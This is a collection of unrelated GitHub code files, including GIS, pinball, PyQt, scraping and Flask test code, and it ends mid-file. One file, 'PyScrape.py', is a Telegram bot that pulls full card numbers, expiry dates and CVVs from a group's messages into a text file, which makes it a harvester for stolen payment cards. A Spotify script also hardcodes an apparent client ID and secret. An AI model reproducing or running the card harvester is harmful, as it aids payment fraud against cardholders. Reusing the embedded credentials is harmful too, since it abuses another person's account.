default=['./input/input.JPEG'])\n parser.add_argument('--batch-size', type=int, default=512)\n parser.add_argument('--subimage-size', type=int, default=33)\n\n args = parser.parse_args()\n\n def reshape_for_output(image):\n shape = image.shape\n if len(shape) > 3:\n shape = shape[1:]\n return image.reshape(shape)*255\n\n def write_image_to_file(image, filename):\n image = reshape_for_output(image)\n images_out = tf.image.encode_jpeg(image)\n fh = open(filename, \"wb+\")\n fh.write(images_out.eval())\n fh.close()\n\n\n if args.mode == 'train':\n from train import Trainer\n from files import FileReader\n m = Model(batch_size=args.batch_size)\n m.build_model()\n with tf.Session() as sess:\n t = Trainer(sess, m)\n f = FileReader('./images/sets/train/*.JPEG', (args.subimage_size, args.subimage_size), batch_size=args.batch_size)\n v = FileReader('./images/sets/validation/*.JPEG', (args.subimage_size, args.subimage_size), batch_size=args.batch_size)\n\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver(tf.trainable_variables())\n try:\n saver.restore(sess, args.model)\n except:\n print('No save file found. Creating new file at {}'.format(args.model));\n f.start_queue_runners()\n v.start_queue_runners()\n t.train(f.get_batch(), saver=saver, path=args.model, val=v.get_batch())\n v.stop_queue_runners()\n f.stop_queue_runners()\n elif args.mode == 'generate':\n if args.input is None:\n print(\"must provide an input file in generate mode\")\n sys.exit(1)\n from files import FileReader\n from validation import produce_low_resolution as plr\n m = Model(is_training=False)\n m.build_model()\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver(tf.trainable_variables())\n try:\n saver.restore(sess, args.model)\n except:\n print('Could not load model file: {}!'.format(args.model))\n sys.exit(1)\n # Generate new images here\n filename_queue = tf.train.string_input_producer(args.input)\n image_reader = tf.WholeFileReader()\n _, image_file = image_reader.read(filename_queue)\n image = tf.image.decode_jpeg(image_file, channels=3)\n # Crop the image to the desired size\n crop_shape = tf.concat([(256,256), [3]], 0)\n cropped = tf.random_crop(image, crop_shape)\n cropped = tf.cast(cropped, tf.float32)/255.\n\n batch = tf.train.batch([cropped], batch_size=1)\n\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n\n output, bicubic = sess.run([m.image_output, m.bicubic], feed_dict={m.input: batch.eval()})\n\n coord.request_stop()\n coord.join(threads)\n # Calculate PSNR gain for each one\n write_image_to_file(output, './outputs/output.jpg')\n\n write_image_to_file(bicubic, './outputs/bicubic.jpg')\n else:\n print('Invalid \"mode\": {}!'.format(args.mode))\n sys.exit(0)\n","repo_name":"calebzulawski/image-super-resolution","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"38180496447","text":"import grass.script as grass\nfrom grass.exceptions import CalledModuleError\n\n############################################################################\n\n\ndef main():\n # lazy imports\n import grass.temporal as tgis\n\n # Get the options\n input = options[\"input\"]\n output = options[\"output\"]\n method = options[\"method\"]\n quantile = options[\"quantile\"]\n order = options[\"order\"]\n memory = options[\"memory\"]\n nprocs = options[\"nprocs\"]\n where = options[\"where\"]\n max_files_open = int(options[\"file_limit\"])\n add_time = flags[\"t\"]\n nulls = flags[\"n\"]\n\n # Check if number of methods and output maps matches\n if \"quantile\" in method:\n len_method = len(method.split(\",\")) - 1\n else:\n len_method = len(method.split(\",\"))\n\n if (len(list(filter(None, quantile.split(\",\")))) + len_method) != len(\n output.split(\",\")\n ):\n grass.fatal(_(\"Number requested methods and output maps do not match.\"))\n\n # Make sure the temporal database exists\n tgis.init()\n\n sp = tgis.open_old_stds(input, \"strds\")\n\n rows = sp.get_registered_maps(\"id\", where, order, None)\n\n if rows:\n # Create the r.series input file\n filename = grass.tempfile(True)\n file = open(filename, \"w\")\n\n for row in rows:\n string = \"%s\\n\" % (row[\"id\"])\n file.write(string)\n\n file.close()\n\n flag = \"\"\n if len(rows) > max_files_open:\n grass.warning(\n _(\n \"Processing over {} maps: activating -z flag of r.series which slows down processing.\".format(\n max_files_open\n )\n )\n )\n flag += \"z\"\n if nulls:\n flag += \"n\"\n\n try:\n grass.run_command(\n \"r.series\",\n flags=flag,\n file=filename,\n output=output,\n overwrite=grass.overwrite(),\n method=method,\n quantile=quantile,\n memory=memory,\n nprocs=nprocs,\n )\n except CalledModuleError:\n grass.fatal(_(\"%s failed. Check above error messages.\") % \"r.series\")\n\n if not add_time:\n # We need to set the temporal extent from the subset of selected maps\n maps = sp.get_registered_maps_as_objects(\n where=where, order=order, dbif=None\n )\n first_map = maps[0]\n last_map = maps[-1]\n start_a, end_a = first_map.get_temporal_extent_as_tuple()\n start_b, end_b = last_map.get_temporal_extent_as_tuple()\n\n if end_b is None:\n end_b = start_b\n\n if first_map.is_time_absolute():\n extent = tgis.AbsoluteTemporalExtent(start_time=start_a, end_time=end_b)\n else:\n extent = tgis.RelativeTemporalExtent(\n start_time=start_a,\n end_time=end_b,\n unit=first_map.get_relative_time_unit(),\n )\n\n for out_map in output.split(\",\"):\n # Create the time range for the output map\n if out_map.find(\"@\") >= 0:\n id = out_map\n else:\n mapset = grass.gisenv()[\"MAPSET\"]\n id = out_map + \"@\" + mapset\n\n map = sp.get_new_map_instance(id)\n map.load()\n\n map.set_temporal_extent(extent=extent)\n\n # Register the map in the temporal database\n if map.is_in_db():\n map.update_all()\n else:\n map.insert()\n\n\nif __name__ == \"__main__\":\n options, flags = grass.parser()\n main()\n","repo_name":"OSGeo/grass","sub_path":"temporal/t.rast.series/t.rast.series.py","file_name":"t.rast.series.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","stars":687,"dataset":"github-code","pt":"19"} +{"seq_id":"17708517764","text":"class Solution:\n def findingUsersActiveMinutes(self, logs: List[List[int]], k: int) -> List[int]:\n result = [0] * k\n \n logs_dict = dict()\n \n for log in logs:\n if logs_dict.get(log[0]) is None:\n logs_dict[log[0]] = set()\n logs_dict[log[0]].add(log[1])\n \n for key, item in logs_dict.items():\n result[len(item) - 1] += 1\n \n return result\n \n","repo_name":"tnals5152/coding-practice","sub_path":"leetcode/medium/1817. Finding the Users Active Minutes.py","file_name":"1817. Finding the Users Active Minutes.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71404159403","text":"import requests\nfrom bs4 import BeautifulSoup\nimport spotipy\nfrom spotipy.oauth2 import SpotifyOAuth\n\n\n# user_date = input(\"Which year do you want to travel to? Type the date in this format YYYY-MM-DD: \")\n# response = requests.get(url=f\"https://www.billboard.com/charts/hot-100/{user_date}/\")\nresponse = requests.get(url=f\"https://www.billboard.com/charts/hot-100/2000-08-12/\")\nsongs_response = response.text\n\n\nsoup = BeautifulSoup(songs_response, 'html.parser')\n\nsongs_title = soup.find_all(name=\"h3\", id=\"title-of-a-story\")\n\nsongs = []\nfor x in songs_title[6::2]:\n songs.append(x.getText().split('\\n'))\n\nlist_songs = []\nfor song in songs[::2]:\n list_songs.append(song[1])\n\n\n# SPOTIFY\n\nCLIENT_ID = \"f57de8bd23b24aeea99799dcb92d8510\"\nCLIENT_SECRET = \"1ddf6a8ce423492789ec83a3251c9edd\"\n\n\nsp = spotipy.Spotify(\n auth_manager=SpotifyOAuth(\n client_id=CLIENT_ID,\n client_secret=CLIENT_SECRET,\n redirect_uri=\"https://www.billboard.com/charts/hot-100/2000-08-12/\",\n scope=\"user-library-read\",\n cache_path='.cache',\n show_dialog=True\n )\n)\n\nresults = sp.current_user_saved_tracks()\nfor idx, item in enumerate(results['items']):\n track = item['track']\n print(idx, track['artists'][0]['name'], \" – \", track['name'])\n\n# 3 STEP\nuser_id = sp.current_user()[\"id\"]\ndate = \"2000-08-12\"\nsong_names = [\"The list of song\", \"titles from your\", \"web scrape\"]\n\nsong_uris = []\nyear = date.split(\"-\")[0]\nfor song in song_names:\n result = sp.search(q=f\"track:{song} year:{year}\", type=\"track\")\n print(result)\n try:\n uri = result[\"tracks\"][\"items\"][0][\"uri\"]\n song_uris.append(uri)\n except IndexError:\n print(f\"{song} doesn't exist in Spotify. Skipped.\")\n\n\n\n# 4 STEP\n\n\nplaylist = sp.user_playlist_create(user=user_id, name=f\"{date} Billboard 100\", public=False)\nprint(playlist)\n\n#Adding songs found into the new playlist\nsp.playlist_add_items(playlist_id=playlist[\"id\"], items=song_uris)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"aruneshkumar324/100-Days-Python","sub_path":"46-Day/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24094002274","text":"#!/usr/bin/python\n\nimport parser\nimport html_printer\nimport sys\nimport abbreviation\nimport person\nimport re\nimport os\n\ndef make_html(instream, outstream, title):\n\tp = parser.parser()\n\tprinter = html_printer.printer(outstream)\n\thtml_printer.prelude(outstream, title)\n\n\tj = p.parse(instream, sys.argv[1])\n\n\tamapper = abbreviation.mapper()\n\tfor i in j:\n\t\tfor k in i.results:\n\t\t\tamapper.analyse_result(k)\n\n\tremapper = abbreviation.remapper(amapper.shorts)\n\tpeo = person.analyser()\n\tfor i in j:\n\t\tfor k in i.results:\n\t\t\tremapper.fix_result(k)\n\t\t\tpeo.analyse_result(k)\n\n\tfor i in j:\n\t\tprinter.print_comp(i)\n\t\tprint >>outstream, \"\\n\"\n\n\tprint >>outstream, \"

    Per-person summary

    \\n

    Note: you can click the table headings for different sortings

    \"\n\tpp = html_printer.personlist_printer(peo.people.values(), True, outstream)\n\tpp.print_people()\n\nif len(sys.argv) != 3:\n\tprint >>sys.stderr, \"Usage \", sys.argv[0], \" input-file output-file\"\n\tsys.exit(1)\n\ntitle = re.sub(\".txt$\", \"\", sys.argv[1])\ntitle = re.sub(\"^.*/\", \"\", title)\noutfile = file(sys.argv[2], \"w\")\ninfile = file(sys.argv[1], \"r\")\nmake_html(infile, outfile, title)\n","repo_name":"wmanley/BAR-Results-Parser","sub_path":"src/make_html.py","file_name":"make_html.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"42115802359","text":"\"\"\"Contains the base classes for spinners.\"\"\"\n\nfrom mpf.core.enable_disable_mixin import EnableDisableMixinSystemWideDevice\n\nfrom mpf.core.delays import DelayManager\nfrom mpf.core.device_monitor import DeviceMonitor\nfrom mpf.core.system_wide_device import SystemWideDevice\nfrom mpf.exceptions.config_file_error import ConfigFileError\n\n\nMYPY = False\nif MYPY: # pragma: no cover\n from mpf.core.machine import MachineController # pylint: disable-msg=cyclic-import,unused-import\n\n\n@DeviceMonitor(_active=\"active\", _idle=\"idle\")\nclass Spinner(EnableDisableMixinSystemWideDevice, SystemWideDevice):\n\n \"\"\"Represents a spinner or spinner group in a pinball machine.\"\"\"\n\n config_section = 'spinners'\n collection = 'spinners'\n class_label = 'spinner'\n\n __slots__ = [\"hits\", \"_active_ms\", \"_active\", \"_idle\", \"delay\"]\n\n def __init__(self, machine: \"MachineController\", name: str) -> None:\n \"\"\"initialize spinner device.\"\"\"\n super().__init__(machine, name)\n self._active = False\n self._idle = True\n self._active_ms = None\n self.hits = None\n self.delay = DelayManager(machine)\n self.enabled = True # Default to enabled\n\n async def _initialize(self):\n await super()._initialize()\n self.hits = 0\n # Cache this value because it's used a lot in rapid succession\n self._active_ms = self.config['active_ms']\n # Can't read the switch until the switch controller is set up\n self.machine.events.add_handler('init_phase_4',\n self._register_switch_handlers, priority=1)\n\n def _register_switch_handlers(self, **kwargs):\n del kwargs\n\n labels = dict(zip(self.config['switches'], self.config['labels'])) if self.config['labels'] else None\n for switch in self.config['switches']:\n callback_kwargs = {\"label\": labels[switch]} if labels else None\n # register for notification of switch active state\n self.machine.switch_controller.add_switch_handler_obj(\n switch,\n self._update_state_from_switch, 1, callback_kwargs=callback_kwargs)\n\n def _update_state_from_switch(self, **kwargs):\n if not self.enabled:\n return\n label = kwargs.get(\"label\")\n if not self._active:\n self.machine.events.post(\"spinner_{}_active\".format(self.name), label=label)\n '''event: spinner_(name)_active\n desc: The idle spinner (name) was just hit and became active.\n\n This event will post whenever a spinner switch is hit and the spinner\n is not already active.\n\n args:\n label: The label of the switch that triggered the activation\n '''\n if label:\n self.machine.events.post(\"spinner_{}_{}_active\".format(self.name, label))\n '''event: spinner_(name)_(label)_active\n desc: The idle spinner (name) was just hit and became active.\n\n This event will post whenever a spinner switch is hit and the spinner\n is not already active, but only if labels are defined for the spinner.\n '''\n self._active = True\n self._idle = False\n self.hits += 1\n self.machine.events.post(\"spinner_{}_hit\".format(self.name), hits=self.hits, label=label)\n '''event: spinner_(name)_hit\n desc: The spinner (name) was just hit.\n\n This event will post whenever a spinner switch is hit.\n\n args:\n hits: The number of switch hits the spinner has had since it became active\n label: The label of the switch that was hit\n '''\n if label:\n self.machine.events.post(\"spinner_{}_{}_hit\".format(self.name, label))\n '''event: spinner_(name)_(label)_hit\n desc: The spinner (name) was just hit on the switch labelled (label).\n\n This event will post whenever a spinner switch is hit and labels\n are defined for the spinner\n '''\n self.delay.clear()\n self.delay.add(self._active_ms, self._deactivate)\n\n def _deactivate(self, **kwargs):\n \"\"\"Post an 'inactive' event after no switch hits for the active_ms duration.\"\"\"\n del kwargs\n self.machine.events.post(\"spinner_{}_inactive\".format(self.name), hits=self.hits)\n '''event: spinner_(name)_inactive\n desc: The spinner (name) is no longer receiving hits\n\n This event will post whenever a spinner has not received hits and\n its active_ms has timed out.\n\n args:\n hits: The number of switch hits the spinner had while it was active\n '''\n self._active = False\n if self.config['idle_ms']:\n self.delay.add(self.config['idle_ms'], self._on_idle)\n if self.config['reset_when_inactive']:\n self.hits = 0\n else:\n self._idle = True\n\n def _on_idle(self, **kwargs):\n \"\"\"Post an 'idle' event if the spinner has been inactive for the idle_ms duration.\"\"\"\n del kwargs\n self.machine.events.post(\"spinner_{}_idle\".format(self.name), hits=self.hits)\n '''event: spinner_(name)_idle\n desc: The spinner (name) is now idle\n\n This event will post whenever a spinner has not received hits and\n its idle_ms has timed out. If no idle_ms is defined, this event\n will not post.\n\n args:\n hits: The number of switch hits the spinner had while it was active\n '''\n self.hits = 0\n self._idle = True\n\n def validate_and_parse_config(self, config: dict, is_mode_config: bool, debug_prefix: str = None):\n \"\"\"Validate and parse spinner config.\"\"\"\n config = super().validate_and_parse_config(config, is_mode_config, debug_prefix)\n for switch in config['switch']:\n if switch not in config['switches']:\n config['switches'].append(switch)\n\n if config['labels'] and len(config['labels']) != len(config['switches']):\n raise ConfigFileError(\"Spinner labels must be the same number as switches\", 1, self.name)\n\n return config\n\n @property\n def active(self):\n \"\"\"Return whether the spinner is actively spinning.\"\"\"\n return self._active\n\n @property\n def idle(self):\n \"\"\"Return whether the spinner is idle.\"\"\"\n return self._idle\n","repo_name":"missionpinball/mpf","sub_path":"mpf/devices/spinner.py","file_name":"spinner.py","file_ext":"py","file_size_in_byte":6411,"program_lang":"python","lang":"en","doc_type":"code","stars":192,"dataset":"github-code","pt":"19"} +{"seq_id":"25296741455","text":"'''\n\n用web浏览器控件(QWebEngineView)显示网页\nPyqt5和web的交互技术\n同时使用python和web开发程序,混合开发\n\nPython+JavaScript+html+Css\n\nQWebEngineView\n\n'''\n\nimport sys,math\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWebEngineWidgets import QWebEngineView\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import Qt, QTimer, QDateTime, pyqtSignal, QThread, QUrl\nimport os\n\n\nclass WebEngineView(QMainWindow):\n def __init__(self):\n super(WebEngineView, self).__init__()\n self.setWindowTitle('打开外部网页例子')\n self.setGeometry(5,30,1355,730)\n self.initUI()\n\n def initUI(self):\n self.browser=QWebEngineView()\n\n #显示网页\n #self.browser.load(QUrl('https://www.jd.com'))\n #显示本地页面\n url=os.getcwd()+'/test.html'\n #self.browser.load(QUrl.fromLocalFile(url))\n\n #显示嵌入web代码页面\n self.browser.setHtml(\n '''\n \n\n\n \n 测试页面\n\n\n

    Hello world PyQt5

    \n

    Hello world PyQt5

    \n

    Hello world PyQt5

    \n

    Hello world PyQt5

    \n

    Hello world PyQt5

    \n\n''')\n\n self.setCentralWidget(self.browser)\n\n\n\n\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n main = WebEngineView()\n main.show()\n\n sys.exit(app.exec_())","repo_name":"zstar2013/pyqt5","sub_path":"src/web/webEngineView.py","file_name":"webEngineView.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1068110683","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\n\nimport Stadium\nimport Manager\n\ndef main(website):\n res = requests.get(Website, headers={'User-Agent': 'Mozilla/5.0'})\n content = BeautifulSoup(res.content, 'lxml')\n\n #Team Name#\n\n for HTMLDiv in content.find_all(class_=\"dataName\"):\n for HTMLH1 in HTMLDiv.find_all(\"h1\"):\n if HTMLH1.attrs[\"itemprop\"] == \"name\":\n for HTMLSpan in HTMLH1.find_all(\"span\"):\n TeamName = HTMLSpan.string\n\n for HTMLDiv in content.find_all(class_=\"dataZusatzDaten\"):\n for HTMLSpan in HTMLDiv.find_all(\"span\", class_=\"hauptpunkt\"):\n for HTMLA in HTMLSpan.find_all(\"a\"):\n TeamLeague = HTMLA.string.strip()\n\n for HTMLDiv in content.find_all(class_=\"dataBottom\"):\n dataDaten = 0\n for HtMLDaten in content.find_all(class_=\"dataDaten\"):\n dataDaten = dataDaten + 1\n if dataDaten == 2:\n HTMLPCount = 0\n for HTMLP in HtMLDaten.find_all(\"p\"):\n HTMLPCount = HTMLPCount + 1\n if HTMLPCount == 2:\n for HTMLSpan in HTMLP.find_all(\"span\", class_=\"dataValue\"):\n for HTMLAStadium in HTMLSpan.find_all(\"a\"):\n StadiumName = HTMLAStadium.string.replace(\"'\", \"\")\n StadiumWebsite = HTMLAStadium.attrs[\"href\"]\n StadiumWebsite = \"https://www.transfermarkt.co.uk\" + StadiumWebsite\n Stadium.stadium(StadiumWebsite)\n\n for HTMLDiv in content.find_all(class_=\"container-hauptinfo\"):\n for HTMLDivA in HTMLDiv.find_all(\"a\"):\n ManagerWebsite = HTMLDivA.attrs[\"href\"]\n ManagerWebsite = \"https://www.transfermarkt.co.uk\" + ManagerWebsite\n Manager.main(ManagerWebsite,\"manager\")\n\n\nif __name__ == '__main__':\n Website = \"https://www.transfermarkt.co.uk/crawley-town/transfers/verein/3537/saison_id/2020\"\n main(Website)\n","repo_name":"spyfire14/FootballAnalysis","sub_path":"Club/Club_Loader.py","file_name":"Club_Loader.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20678140572","text":"from flask_testing import LiveServerTestCase\nfrom selenium import webdriver \nfrom urllib.request import urlopen\nfrom flask import url_for\nfrom application import app, db\n# We dont need everything from these files -> just the things we are testing\nfrom application.models import Task\nfrom application.forms import ToDoForm\n\nclass TestBase(LiveServerTestCase):\n TEST_PORT = 5050\n\n def create_app(self):\n app.config.update(\n SQLALCHEMY_DATABASE_URI = 'sqlite:///test-app.db',\n LIVESERVER_PORT = self.TEST_PORT,\n DEBUG = True,\n TESTING = True\n )\n return app\n\n def setUp(self):\n # for this test we do need to add sample data\n # if we updating an existing post - we would need to add a record here \n db.create_all()\n options = webdriver.chrome.options.Options()\n # makes it so we dont have a gui interface - is all done in the terminal\n options.add_argument('--headless')\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--disable-dev-shm-usage\")\n self.driver = webdriver.Chrome(options=options)\n self.driver.get(f'http://localhost:{self.TEST_PORT}/add-task/')\n\n def tearDown(self):\n self.driver.quit()\n db.session.remove()\n db.drop_all()\n\n def test_server_connectivity(self):\n response = urlopen(f'http://localhost:{self.TEST_PORT}/add-task/')\n assert response.status == 200\n\nclass TestAddPost(TestBase):\n def submit_input(self, test_case):\n name_field = self.driver.find_element_by_xpath('/html/body/div[1]/form/input[2]')\n description_field = self.driver.find_element_by_xpath('/html/body/div[1]/form/textarea')\n due_date_field = self.driver.find_element_by_xpath('/html/body/div[1]/form/input[3]')\n submit_field = self.driver.find_element_by_xpath('/html/body/div[1]/form/input[5]')\n\n # we will be sending the test case as a tuple\n name_field.send_keys(test_case[0])\n description_field.send_keys(test_case[1])\n due_date_field.click()\n due_date_field.send_keys(test_case[2])\n submit.click()\n\n def test_add_post(self):\n test_case = \"Test 1\", \"Hello World\", \"31052023\"\n self.submit_input(test_case)\n\n assert list(Post.query.all()) != []\n assert Post.query.filter_by(name=\"Test 1\").first() is not None\n\n def test_add_post_validation(self):\n test_case = \"\", \"Hello World\", \"2022/07/28\"\n self.submit_input(test_case)\n\n assert list(Post.query.all()) == []\n assert Post.query.filter_by(name=\"\").first() is None","repo_name":"ahsansabir30/to-do-app","sub_path":"test/test_integration_addpost.py","file_name":"test_integration_addpost.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"42907735671","text":"import os\nimport re\nimport asyncio\nfrom dotenv import load_dotenv\nfrom telethon import TelegramClient, events\n\nload_dotenv()\n\nif os.path.exists('.env'):\n update = input(\"The .env file already exists, Do you want to update your API credentials? (y/n) \")\n if update.lower() == 'y':\n api_id = input(\"Enter your API ID: \")\n api_hash = input(\"Enter your API hash: \")\n group_id = input(\"Enter the group ID to scrape: \")\n session_name = input(\"Enter a name for your session: \")\n with open('.env', 'w') as f:\n f.write(f\"API_ID={api_id}\\n\")\n f.write(f\"API_HASH={api_hash}\\n\")\n f.write(f\"GROUP_ID={group_id}\\n\")\n f.write(f\"SESSION_NAME={session_name}\\n\")\n else:\n api_id = int(os.getenv('API_ID'))\n api_hash = os.getenv('API_HASH')\n group_id = int(os.getenv('GROUP_ID'))\n session_name = os.getenv('SESSION_NAME')\nelse:\n api_id = input(\"Enter your API ID: \")\n api_hash = input(\"Enter your API hash: \")\n group_id = input(\"Enter the group ID to scrape: \")\n session_name = input(\"Enter a name for your session: \")\n with open('.env', 'w') as f:\n f.write(f\"API_ID={api_id}\\n\")\n f.write(f\"API_HASH={api_hash}\\n\")\n f.write(f\"GROUP_ID={group_id}\\n\")\n f.write(f\"SESSION_NAME={session_name}\\n\")\n\nclient = TelegramClient(session_name, api_id, api_hash)\n\nasync def extract_card_info(message):\n text = message.message\n match = re.search(r'\\b\\d{15,16}\\b', text)\n if match:\n card_number = match.group().replace(' ', '')\n month_match = re.search(r'(\\b0?[1-9]\\b|\\b1[0-2]\\b)[^\\d]+(\\d{2}|\\d{4})', text)\n if month_match:\n month = month_match.group(1).zfill(2)\n year = month_match.group(2)\n if len(year) == 2:\n year = '20' + year\n cvv_match = re.search(r'\\b\\d{3}\\b', text)\n if cvv_match:\n cvv = cvv_match.group()\n formatted_message = f\"{card_number}|{month}|{year}|{cvv}\"\n with open('card_info.txt', 'a') as f:\n f.write(formatted_message + '\\n')\n print(f'Card info extracted: {formatted_message}')\n\n@client.on(events.NewMessage(chats=[group_id]))\nasync def extract_new_card_info(event):\n message = event.message\n await extract_card_info(message)\n\nasync def main():\n await client.start()\n await client.run_until_disconnected()\n\nif __name__ == '__main__':\n asyncio.run(main())\n\n","repo_name":"PyCHKnet/CC-Scraping-Telegram","sub_path":"PyScrape.py","file_name":"PyScrape.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"39486997167","text":"from netCDF4 import Dataset\nimport numpy as np\nimport math\n\ndef find_density(t, mapping):\n min_diff = 9999\n tmp = 0\n for m in mapping:\n d = abs(t-m)\n if d < min_diff:\n tmp = m\n min_diff = d\n return mapping[tmp]\n\n\n\ndef get_wind_data():\n CP = 0.4\n\n mapping = {\n -40: 1.514,\n -35: 1.4843,\n -30: 1.395,\n -25: 1.4243,\n -10: 1.399,\n -5: 1.3178,\n 0: 1.269,\n 10: 1.247,\n 15: 1.225,\n 20: 1.204,\n 25: 1.184,\n 30: 1.165,\n 40: 1.127,\n 50: 1.109\n }\n\n fh = Dataset(\"./cropped_wind.nc\", \"r\", format=\"NETCDF4\")\n# fh = Dataset(\"../PythonWorkplace/datasets/wind.nc\", \"r\", format=\"NETCDF4\")\n\n # latbounds = [35.01186, 41.50306]\n # lonbounds = [19.91975, 28.2225]\n\n lons = fh.variables['longitude'][:]\n lats = fh.variables['latitude'][:]\n tmax = fh.variables['time'][:]\n tmax_units = fh.variables['time'].units\n\n temp = fh.variables['t2m'][:] - 273.15\n pressure = fh.variables['sp'][:]\n\n u10 = fh.variables['u10'][:]\n v10 = fh.variables['v10'][:]\n\n np_u10 = np.array(u10)**2\n np_v10 = np.array(v10)**2\n\n speed = np.sqrt(np.add(np_u10, np_v10))\n\n nullified_speed = np.where([(speed > 3) & (speed < 25)], speed, 0)\n #nullified_speed = np.where([(speed > 3) & (speed < 25)], speed, speed)\n\n #import ipdb; ipdb.set_trace()\n\n vec_func = np.vectorize(find_density)\n c = np.array(temp)\n\n density = np.array(vec_func(c, mapping))\n \n return (nullified_speed, density, CP, tmax, lons, lats)\n\nif __name__ == '__main__':\n get_wind_data()\n","repo_name":"V4570/earth_wind_fire","sub_path":"wind_speed.py","file_name":"wind_speed.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70822332203","text":"import os\nfrom datetime import datetime\n\nfrom backtest.domains.selector_reference import SelectorReference\nfrom backtest.request.selector_reference_from_repo import (\n SelectorReferenceFromRepoInvalidRequest,\n SelectorReferenceFromReponValidRequest,\n)\nfrom backtest.response import ResponseFailure, ResponseSuccess, ResponseTypes, build_response_from_invalid_request\n\nSELECTOR_REFERENCE_CSV_REPO_PATH = \"backtest/csvrepo/selector_reference/{repo_name}_{symbol}_{from_date}_{to_date}.csv\"\nSELECTOR_REFERENCE_CSV_REPO_DIR_PATH = \"backtest/csvrepo/selector_reference\"\n\n\ndef selector_reference_from_repo(repo, request, cache=False):\n str_today = datetime.strftime(datetime.now(), \"%Y-%m-%d\")\n repo_name = type(repo).__name__\n symbol = \"NOSYM\"\n from_date = \"1999-01-01\"\n to_date = str_today\n\n if not request and not isinstance(request, SelectorReferenceFromReponValidRequest):\n invalid_request = SelectorReferenceFromRepoInvalidRequest()\n invalid_request.add_error(\"param_error\", \"this request not supported..\")\n return build_response_from_invalid_request(invalid_request)\n elif request.filters:\n symbol = request.filters[\"symbol__eq\"] if \"symbol__eq\" in request.filters else \"NOSYM\"\n from_date = request.filters[\"from__eq\"] if \"from__eq\" in request.filters else \"1990-01-01\"\n to_date = request.filters[\"to__eq\"] if \"to__eq\" in request.filters else str_today\n CSV_PATH = SELECTOR_REFERENCE_CSV_REPO_PATH.format(\n repo_name=repo_name, symbol=symbol, from_date=from_date, to_date=to_date\n )\n if cache:\n try:\n selector_reference = SelectorReference.from_csv(CSV_PATH, symbol=symbol)\n return ResponseSuccess(selector_reference)\n except FileNotFoundError:\n pass\n try:\n selector_reference = repo.get(filters=request.filters)\n if cache:\n os.makedirs(SELECTOR_REFERENCE_CSV_REPO_DIR_PATH, exist_ok=True)\n selector_reference.to_csv(CSV_PATH)\n return ResponseSuccess(selector_reference)\n except Exception as e:\n return ResponseFailure(ResponseTypes.SYSTEM_ERROR, e)\n","repo_name":"fromitive/backtest","sub_path":"backtest/use_cases/selector_reference_from_repo.py","file_name":"selector_reference_from_repo.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28496684747","text":"\r\n# Assuming Python 2.x\r\n# For Python 3.x support change print -> print(..) and Tkinter to tkinter\r\nfrom tkinter import *\r\nimport time\r\nimport math\r\n\r\n\r\n\r\nclass animasi(object):\r\n \r\n\r\n def __init__(self):\r\n apax=50\r\n apay=363\r\n\r\n\r\n self.root = Tk()\r\n\r\n self.canvas = Canvas(self.root, width=500, height = 600)\r\n self.canvas.pack()\r\n \r\n #self.bola = self.canvas.create_oval(2, 960, 42, 1000, outline='white', fill='blue')\r\n \r\n self.bola = self.canvas.create_oval(apax+0, apay+0, apax+40, apay+40, outline='white', fill='red')\r\n self.canvas.pack()\r\n \r\n self.root.after(0, self.animation)\r\n self.root.mainloop()\r\n \r\n\r\n def animation(self):\r\n \r\n #kordinat posisi awal\r\n x = 20\r\n y = 0\r\n\r\n #kecepatan perpindahan\r\n xhasil = 0.1\r\n \r\n #menjalankan animasi\r\n jalan = True\r\n while jalan:\r\n \r\n ylama = y\r\n \r\n #fungsi Trigonometri\r\n y = 200 * math.sin(x)\r\n\r\n yhasil = y - ylama\r\n x = x + xhasil\r\n \r\n #delay looping\r\n time.sleep(0.025)\r\n \r\n self.canvas.move(self.bola, xhasil, yhasil)\r\n self.canvas.update()\r\n \r\n\r\n\r\nanimasi()\r\n","repo_name":"natalisransi/animasi","sub_path":"tugas_animasi.py","file_name":"tugas_animasi.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"8347239829","text":"import torch\nimport numpy as np \nimport math\nimport os\nimport torchvision.transforms as transforms\nfrom PIL import Image\n \ndef saveImage(tensor, filename, original = None, keepColors = False, nrow=8, padding=2, pad_value=0):\n \"\"\"Save a given Tensor into an image file.\n Args:\n tensor (Tensor or list): Image to be saved. If given a mini-batch tensor,\n 